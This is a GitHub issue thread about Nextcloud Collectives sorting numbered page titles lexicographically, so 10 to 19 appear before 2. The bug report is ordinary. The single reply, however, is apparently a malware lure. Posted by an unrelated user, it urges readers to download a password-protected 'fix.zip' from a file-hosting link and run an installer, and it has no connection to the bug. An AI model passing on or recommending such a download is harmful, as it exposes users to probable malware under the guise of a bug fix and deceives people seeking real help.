### ISSUE TITLE
Sorting page "A to Z" don't order correctly numbers 1, 10, 11, 12, ..., 2, 3, 4..., 9

### ISSUE THREAD

**Issue by Thatoo** [nextcloud/collectives#1447]
**Describe the bug**
To ensure the way we want page to be sorted, we add number to their title to have something like  : 

```
1. title1
  1.1 title 1.1
  1.2 title 1.2
  1.3 title 1.3
2. title 2
  2.1 title 2.1
  2.2 title 2.2
3. title 3
4. ....
....
10. title 10
11. title 11
....
19. title 19
```

but we get in result soemthing like
```
1. title1
  1.1 title 1.1
  1.2 title 1.2
  1.3 title 1.3
10. title 10
11. title 11
12. title 12
....
19. title 19
2. title 2
  2.1 title 2.1
  2.2 title 2.2
3. title 3
4. ....
```

**To Reproduce**
1. Go to Collectives
2. Writes pages and subpages using classical ordered/numbered list
3. set oredring A to Z
4. see wrong ordering made by collectives.

**Expected behavior**
Collectives should order pages respecting ordered/numbered list pages

**Screenshots**
![image](https://github.com/user-attachments/assets/46aedde5-4f46-42c8-9cf4-41ca1210d047)

**Server details:**
- Collectives app version: 2.14.2
- Nextcloud version: 29.0.5
- PHP Version: 8.3.10
- Database: MariaDB 10.5.23

**Client details:**
 - OS: NixOS 24.05
 - Browser: Firefox
 - Browser version: 129.0.2
 - Device: Computer

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
